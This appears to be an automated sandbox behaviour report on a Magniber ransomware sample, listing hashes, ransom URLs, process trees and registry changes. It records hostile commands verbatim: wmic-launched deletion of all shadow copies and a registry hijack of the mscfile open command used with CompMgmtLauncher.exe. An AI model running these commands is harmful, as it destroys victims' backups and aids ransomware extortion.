Analysis
-
max time kernel
122s -
max time network
154s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
22-05-2021 11:01
Static task
static1
Behavioral task
behavioral1
Sample
c6b6ec00_by_Libranalysis.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
c6b6ec00_by_Libranalysis.exe
Resource
win10v20210410
General
-
Target
c6b6ec00_by_Libranalysis.exe
-
Size
22KB
-
MD5
c6b6ec00b64069d66c8d14d65f7cfd8f
-
SHA1
b90e6bf12728fa3b0984aabc32b39f1db082a1da
-
SHA256
7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed
-
SHA512
c9d7c97c63806e87804c33530f48ba950542ba28421d354cb287c9bf027ff5a853b76200e87eadd3cde0469f4b8c93f8c4bc0e71f5e4aa1cdf33e05c0673254a
Malware Config
Extracted
C:\Users\Admin\Desktop\readme.txt
magniber
http://50b03ce896784a70d4csnwyqmwa.erpp3f6j634gmj33.onion/csnwyqmwa
http://50b03ce896784a70d4csnwyqmwa.jobsbig.cam/csnwyqmwa
http://50b03ce896784a70d4csnwyqmwa.nowuser.casa/csnwyqmwa
http://50b03ce896784a70d4csnwyqmwa.boxgas.icu/csnwyqmwa
http://50b03ce896784a70d4csnwyqmwa.bykeep.club/csnwyqmwa
Signatures
-
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Process spawned unexpected child process 8 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.execmd.execmd.execmd.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1688 1396 cmd.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1316 1396 cmd.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1784 1396 cmd.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1576 1396 cmd.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2668 1396 vssadmin.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2660 1396 vssadmin.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2652 1396 vssadmin.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2756 1396 vssadmin.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 11 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
taskhost.exedescription ioc process File renamed C:\Users\Admin\Pictures\CompleteDeny.tif => C:\Users\Admin\Pictures\CompleteDeny.tif.csnwyqmwa taskhost.exe File renamed C:\Users\Admin\Pictures\GetWrite.png => C:\Users\Admin\Pictures\GetWrite.png.csnwyqmwa taskhost.exe File renamed C:\Users\Admin\Pictures\ResolveSave.tiff => C:\Users\Admin\Pictures\ResolveSave.tiff.csnwyqmwa taskhost.exe File opened for modification C:\Users\Admin\Pictures\SendJoin.tiff taskhost.exe File renamed C:\Users\Admin\Pictures\UseNew.tiff => C:\Users\Admin\Pictures\UseNew.tiff.csnwyqmwa taskhost.exe File renamed C:\Users\Admin\Pictures\RevokeSave.raw => C:\Users\Admin\Pictures\RevokeSave.raw.csnwyqmwa taskhost.exe File renamed C:\Users\Admin\Pictures\SearchSet.raw => C:\Users\Admin\Pictures\SearchSet.raw.csnwyqmwa taskhost.exe File renamed C:\Users\Admin\Pictures\ExitTest.tif => C:\Users\Admin\Pictures\ExitTest.tif.csnwyqmwa taskhost.exe File opened for modification C:\Users\Admin\Pictures\ResolveSave.tiff taskhost.exe File renamed C:\Users\Admin\Pictures\SendJoin.tiff => C:\Users\Admin\Pictures\SendJoin.tiff.csnwyqmwa taskhost.exe File opened for modification C:\Users\Admin\Pictures\UseNew.tiff taskhost.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
c6b6ec00_by_Libranalysis.exedescription pid process target process PID 1920 set thread context of 1124 1920 c6b6ec00_by_Libranalysis.exe taskhost.exe PID 1920 set thread context of 1172 1920 c6b6ec00_by_Libranalysis.exe Dwm.exe PID 1920 set thread context of 1252 1920 c6b6ec00_by_Libranalysis.exe Explorer.EXE -
Interacts with shadow copies 2 TTPs 4 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exepid process 2756 vssadmin.exe 2668 vssadmin.exe 2660 vssadmin.exe 2652 vssadmin.exe -
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000529101d5c9814b4eb0f580b37542e4500000000002000000000010660000000100002000000011fa0e6c400dba38922cd71f14098a00b0c8c0387b68fe1e1443bd778463e80d000000000e8000000002000020000000adf32010815a69779a8e4c6d13cc34db9f5e87d51619f9145c66e5a7040a80bd20000000ea350475971010e22b9da448a13e633f69fb2ad0fbda8e0842fb8195b0384fe8400000007675334ce95b5690f875f7b8d0b4d6a2d9fefe6aac3a0a2f3d0d9abf2e9f9cd22ad5ab11a851a4044ece11ec464d598811791dd1efe7bdabd5bf5607cbe71ca7 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000529101d5c9814b4eb0f580b37542e450000000000200000000001066000000010000200000009c1a4d6a61f881ac43d56dfa9486d77b76fac9e8b1328a8d5038d7b590309956000000000e80000000020000200000004575ca9b47055ab632ca297f8a5d8f34774fcf0c25602e4afb205e9f7d4c1eef900000003755f37bd1e76b3f463bce88ecae414fd3262e68fa0f6ca4984c0ced480b8f9840d38e759bcd9f9f0a1c0320e983ac9a7244b05a2e7e34c7681b8cbaba094e8d2ab8d1ce012357d716b5a418e65bc3f03a6e0d719951fd20a984763d1b4c7e81d4fa1411dd21866c1ef798ee1d24ee27ad0448e867ccbaa6cfac9f611fd69eefb3fd5e279062d1ccf35615ae22284ea1400000002fedb0c1bec437f4183314c01b20a33ae2c19e4557cada7334d6cf612f4c8e894b0a4ada27841af2ee943b888553a0698e317bf8ec147d4579781165b8683692 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d09a34420a4fd701 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "327850180" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{59F34BE1-BAFD-11EB-A5E9-5E661A0063E2} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe -
Modifies registry class 11 IoCs
Processes:
Dwm.exeExplorer.EXEtaskhost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command Dwm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Dwm.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open\command taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\mscfile\shell\open taskhost.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 780 notepad.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
c6b6ec00_by_Libranalysis.exepid process 1920 c6b6ec00_by_Libranalysis.exe 1920 c6b6ec00_by_Libranalysis.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
c6b6ec00_by_Libranalysis.exepid process 1920 c6b6ec00_by_Libranalysis.exe 1920 c6b6ec00_by_Libranalysis.exe 1920 c6b6ec00_by_Libranalysis.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Explorer.EXEWMIC.exeWMIC.exeWMIC.exedescription pid process Token: SeShutdownPrivilege 1252 Explorer.EXE Token: SeShutdownPrivilege 1252 Explorer.EXE Token: SeShutdownPrivilege 1252 Explorer.EXE Token: SeShutdownPrivilege 1252 Explorer.EXE Token: SeShutdownPrivilege 1252 Explorer.EXE Token: SeShutdownPrivilege 1252 Explorer.EXE Token: SeIncreaseQuotaPrivilege 1908 WMIC.exe Token: SeSecurityPrivilege 1908 WMIC.exe Token: SeTakeOwnershipPrivilege 1908 WMIC.exe Token: SeLoadDriverPrivilege 1908 WMIC.exe Token: SeSystemProfilePrivilege 1908 WMIC.exe Token: SeSystemtimePrivilege 1908 WMIC.exe Token: SeProfSingleProcessPrivilege 1908 WMIC.exe Token: SeIncBasePriorityPrivilege 1908 WMIC.exe Token: SeCreatePagefilePrivilege 1908 WMIC.exe Token: SeBackupPrivilege 1908 WMIC.exe Token: SeRestorePrivilege 1908 WMIC.exe Token: SeShutdownPrivilege 1908 WMIC.exe Token: SeDebugPrivilege 1908 WMIC.exe Token: SeSystemEnvironmentPrivilege 1908 WMIC.exe Token: SeRemoteShutdownPrivilege 1908 WMIC.exe Token: SeUndockPrivilege 1908 WMIC.exe Token: SeManageVolumePrivilege 1908 WMIC.exe Token: 33 1908 WMIC.exe Token: 34 1908 WMIC.exe Token: 35 1908 WMIC.exe Token: SeShutdownPrivilege 1252 Explorer.EXE Token: SeIncreaseQuotaPrivilege 1676 WMIC.exe Token: SeSecurityPrivilege 1676 WMIC.exe Token: SeTakeOwnershipPrivilege 1676 WMIC.exe Token: SeLoadDriverPrivilege 1676 WMIC.exe Token: SeSystemProfilePrivilege 1676 WMIC.exe Token: SeSystemtimePrivilege 1676 WMIC.exe Token: SeProfSingleProcessPrivilege 1676 WMIC.exe Token: SeIncBasePriorityPrivilege 1676 WMIC.exe Token: SeCreatePagefilePrivilege 1676 WMIC.exe Token: SeBackupPrivilege 1676 WMIC.exe Token: SeRestorePrivilege 1676 WMIC.exe Token: SeShutdownPrivilege 1676 WMIC.exe Token: SeDebugPrivilege 1676 WMIC.exe Token: SeSystemEnvironmentPrivilege 1676 WMIC.exe Token: SeRemoteShutdownPrivilege 1676 WMIC.exe Token: SeUndockPrivilege 1676 WMIC.exe Token: SeManageVolumePrivilege 1676 WMIC.exe Token: 33 1676 WMIC.exe Token: 34 1676 WMIC.exe Token: 35 1676 WMIC.exe Token: SeShutdownPrivilege 1252 Explorer.EXE Token: SeIncreaseQuotaPrivilege 556 WMIC.exe Token: SeSecurityPrivilege 556 WMIC.exe Token: SeTakeOwnershipPrivilege 556 WMIC.exe Token: SeLoadDriverPrivilege 556 WMIC.exe Token: SeSystemProfilePrivilege 556 WMIC.exe Token: SeSystemtimePrivilege 556 WMIC.exe Token: SeProfSingleProcessPrivilege 556 WMIC.exe Token: SeIncBasePriorityPrivilege 556 WMIC.exe Token: SeCreatePagefilePrivilege 556 WMIC.exe Token: SeBackupPrivilege 556 WMIC.exe Token: SeRestorePrivilege 556 WMIC.exe Token: SeShutdownPrivilege 556 WMIC.exe Token: SeDebugPrivilege 556 WMIC.exe Token: SeSystemEnvironmentPrivilege 556 WMIC.exe Token: SeRemoteShutdownPrivilege 556 WMIC.exe Token: SeUndockPrivilege 556 WMIC.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
Processes:
Explorer.EXEiexplore.exepid process 1252 Explorer.EXE 1804 iexplore.exe 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE -
Suspicious use of SendNotifyMessage 8 IoCs
Processes:
Explorer.EXEpid process 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE 1252 Explorer.EXE -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
iexplore.exeIEXPLORE.EXEpid process 1804 iexplore.exe 1804 iexplore.exe 2100 IEXPLORE.EXE 2100 IEXPLORE.EXE 2100 IEXPLORE.EXE 2100 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
taskhost.execmd.exeDwm.exeExplorer.EXEcmd.execmd.execmd.execmd.exeiexplore.execmd.execmd.execmd.execmd.exeCompMgmtLauncher.exeCompMgmtLauncher.exeCompMgmtLauncher.exeCompMgmtLauncher.exedescription pid process target process PID 1124 wrote to memory of 780 1124 taskhost.exe notepad.exe PID 1124 wrote to memory of 780 1124 taskhost.exe notepad.exe PID 1124 wrote to memory of 780 1124 taskhost.exe notepad.exe PID 1124 wrote to memory of 1404 1124 taskhost.exe cmd.exe PID 1124 wrote to memory of 1404 1124 taskhost.exe cmd.exe PID 1124 wrote to memory of 1404 1124 taskhost.exe cmd.exe PID 1124 wrote to memory of 1864 1124 taskhost.exe cmd.exe PID 1124 wrote to memory of 1864 1124 taskhost.exe cmd.exe PID 1124 wrote to memory of 1864 1124 taskhost.exe cmd.exe PID 1864 wrote to memory of 1908 1864 cmd.exe WMIC.exe PID 1864 wrote to memory of 1908 1864 cmd.exe WMIC.exe PID 1864 wrote to memory of 1908 1864 cmd.exe WMIC.exe PID 1172 wrote to memory of 1540 1172 Dwm.exe cmd.exe PID 1172 wrote to memory of 1540 1172 Dwm.exe cmd.exe PID 1172 wrote to memory of 1540 1172 Dwm.exe cmd.exe PID 1252 wrote to memory of 1728 1252 Explorer.EXE cmd.exe PID 1252 wrote to memory of 1728 1252 Explorer.EXE cmd.exe PID 1252 wrote to memory of 1728 1252 Explorer.EXE cmd.exe PID 1404 wrote to memory of 1804 1404 cmd.exe iexplore.exe PID 1404 wrote to memory of 1804 1404 cmd.exe iexplore.exe PID 1404 wrote to memory of 1804 1404 cmd.exe iexplore.exe PID 1728 wrote to memory of 1676 1728 cmd.exe WMIC.exe PID 1728 wrote to memory of 1676 1728 cmd.exe WMIC.exe PID 1728 wrote to memory of 1676 1728 cmd.exe WMIC.exe PID 1920 wrote to memory of 1680 1920 cmd.exe PID 1920 wrote to memory of 1680 1920 cmd.exe PID 1920 wrote to memory of 1680 1920 cmd.exe PID 1680 wrote to memory of 556 1680 cmd.exe WMIC.exe PID 1680 wrote to memory of 556 1680 cmd.exe WMIC.exe PID 1680 wrote to memory of 556 1680 cmd.exe WMIC.exe PID 1920 wrote to memory of 284 1920 cmd.exe PID 1920 wrote to memory of 284 1920 cmd.exe PID 1920 wrote to memory of 284 1920 cmd.exe PID 284 wrote to memory of 764 284 cmd.exe WMIC.exe PID 284 wrote to memory of 764 284 cmd.exe WMIC.exe PID 284 wrote to memory of 764 284 cmd.exe WMIC.exe PID 1804 wrote to memory of 2100 1804 iexplore.exe IEXPLORE.EXE PID 1804 wrote to memory of 2100 1804 iexplore.exe IEXPLORE.EXE PID 1804 wrote to memory of 2100 1804 iexplore.exe IEXPLORE.EXE PID 1804 wrote to memory of 2100 1804 iexplore.exe IEXPLORE.EXE PID 1576 wrote to memory of 2124 1576 cmd.exe CompMgmtLauncher.exe PID 1576 wrote to memory of 2124 1576 cmd.exe CompMgmtLauncher.exe PID 1576 wrote to memory of 2124 1576 cmd.exe CompMgmtLauncher.exe PID 1688 wrote to memory of 2132 1688 cmd.exe CompMgmtLauncher.exe PID 1688 wrote to memory of 2132 1688 cmd.exe CompMgmtLauncher.exe PID 1688 wrote to memory of 2132 1688 cmd.exe CompMgmtLauncher.exe PID 1316 wrote to memory of 2144 1316 cmd.exe CompMgmtLauncher.exe PID 1316 wrote to memory of 2144 1316 cmd.exe CompMgmtLauncher.exe PID 1316 wrote to memory of 2144 1316 cmd.exe CompMgmtLauncher.exe PID 1784 wrote to memory of 2184 1784 cmd.exe CompMgmtLauncher.exe PID 1784 wrote to memory of 2184 1784 cmd.exe CompMgmtLauncher.exe PID 1784 wrote to memory of 2184 1784 cmd.exe CompMgmtLauncher.exe PID 2132 wrote to memory of 2400 2132 CompMgmtLauncher.exe wmic.exe PID 2132 wrote to memory of 2400 2132 CompMgmtLauncher.exe wmic.exe PID 2132 wrote to memory of 2400 2132 CompMgmtLauncher.exe wmic.exe PID 2144 wrote to memory of 2408 2144 CompMgmtLauncher.exe wmic.exe PID 2144 wrote to memory of 2408 2144 CompMgmtLauncher.exe wmic.exe PID 2144 wrote to memory of 2408 2144 CompMgmtLauncher.exe wmic.exe PID 2124 wrote to memory of 2424 2124 CompMgmtLauncher.exe wmic.exe PID 2124 wrote to memory of 2424 2124 CompMgmtLauncher.exe wmic.exe PID 2124 wrote to memory of 2424 2124 CompMgmtLauncher.exe wmic.exe PID 2184 wrote to memory of 2456 2184 CompMgmtLauncher.exe wmic.exe PID 2184 wrote to memory of 2456 2184 CompMgmtLauncher.exe wmic.exe PID 2184 wrote to memory of 2456 2184 CompMgmtLauncher.exe wmic.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1252 -
C:\Users\Admin\AppData\Local\Temp\c6b6ec00_by_Libranalysis.exe"C:\Users\Admin\AppData\Local\Temp\c6b6ec00_by_Libranalysis.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1920 -
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:556
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:284 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"4⤵PID:764
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
-
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1172 -
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵PID:1540
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Windows\system32\notepad.exenotepad.exe C:\Users\Public\readme.txt2⤵
- Opens file in notepad (likely ransom note)
PID:780
-
-
C:\Windows\system32\cmd.execmd /c "start http://50b03ce896784a70d4csnwyqmwa.jobsbig.cam/csnwyqmwa^&1^&47038039^&81^&363^&12"2⤵
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://50b03ce896784a70d4csnwyqmwa.jobsbig.cam/csnwyqmwa&1&47038039&81&363&123⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1804 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1804 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2100
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1908
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2400
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1316 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2144 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2408
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2456
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1576 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2424
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2668
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2660
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2652
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2756
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:2824
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
d8e3cd1e0d04c5f6061ff57bbaaf88f2
SHA1cdfa82824f4028a0491fdd5ff3ebf4f9ebdc2f80
SHA2564b0d4d66e50c47ad5f83fd3de4c0c472809bbcae9089124dafbf289394d29ba2
SHA51259760191681de46bc2349ffd2278d1dddc015d0a90885edf4c37fa20299befa3ea737910781489379d4cdf27cba8a0ac5fbb96a8fb94c88ef9baed24b0f2106f
-
MD5
8596814211ec99edad67d63be6872a21
SHA1058b440510784605b08894734a1f2159c969dc3b
SHA256c5a500c0e7c6bb98902e9d98e841ca2e739af00907c03e8ef681032881ed5d1b
SHA51281143ccbea1e7ad999762543785c0a15228bbb37759fec5ecb4263b7a30bdd12f40a91b5f0eb8dd7dc77c68ff5b3e88ad2a6a4c90290543f0b47365472d127c2
-
MD5
0ea6db758a9833f921ab52ae4e5fb08e
SHA18d91284456fadcb30b38ce345eb42a56df5c8579
SHA25686a74c80513f991bcfe70e2fe23ab736ccb16a6b1b91390cabae47a61a0088f2
SHA51273ba9944ce447f6259f8438a2df70ab6b32cf2d750137912af3134fe639fd79877a3235c01c954e7731a05d44f0a201d0cac4f018a678cd7b198518822594f86
-
MD5
320c02d5bfe02b6189b550c61e3f2696
SHA17864791db15cae330d4c83a94c510cee0a25830b
